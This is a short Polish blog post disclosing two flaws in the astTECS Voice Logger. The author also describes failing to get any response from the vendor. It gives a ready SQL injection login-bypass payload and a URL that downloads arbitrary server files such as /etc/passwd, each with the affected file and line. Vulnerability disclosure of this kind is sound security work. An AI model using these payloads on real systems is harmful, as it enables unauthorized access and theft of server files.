wtorek, 16 lipca 2013

Hack VoIP #6 - Voice Logger astTECS

Voice Logger astTECS - bypass login & arbitrary file download

Dzisiaj, o błędach w Voice Logger firmy astTECS i o moim doświadczeniu w zgłoszeniu / w próbie zgłoszenia tej podatności. Usiłowałem i nie dałem rady. Próbowałem przez LiveChat na stronie firmy, próbowałem pisać maile do techniki. Nic, zero odzewu i zero zainteresowania ( no może oprócz Pani z LiveChata, która to skierowała mnie do techniki), a czekałem chyba z miesiąc z publikacją.

Pierwsza z opisywanych podatności to SQLi podczas logowania, taki sobie bypass login:

login: admin' or 1='1
password: admin
plik: manager_login.server.php
lina: 168


Drugi z błędów pozwala na pobranie dowolnego pliku z serwera (trzeba pamiętać o uprawnieniach httpd) 

http://192.168.1.145/asttecs/records1.php?file=/etc/passwd
plik:records.php
linia: 2

http://192.168.1.145/asttecs/records.php?file=/etc/passwd
plik:records.php
linia: 2
Autor: o
Etykiety: , ,

Brak komentarzy:

Prześlij komentarz

Proszę zostaw swój komentarz w celu dopowiedzenia tego czego ja nie wiedziałem lub wywołania ciekawej dyskusji. Wprowadziłem moderowanie komentarzy ze względu na dużą popularność bloga wśród różnych SEO botów :)

Subskrybuj: Komentarze do posta (Atom)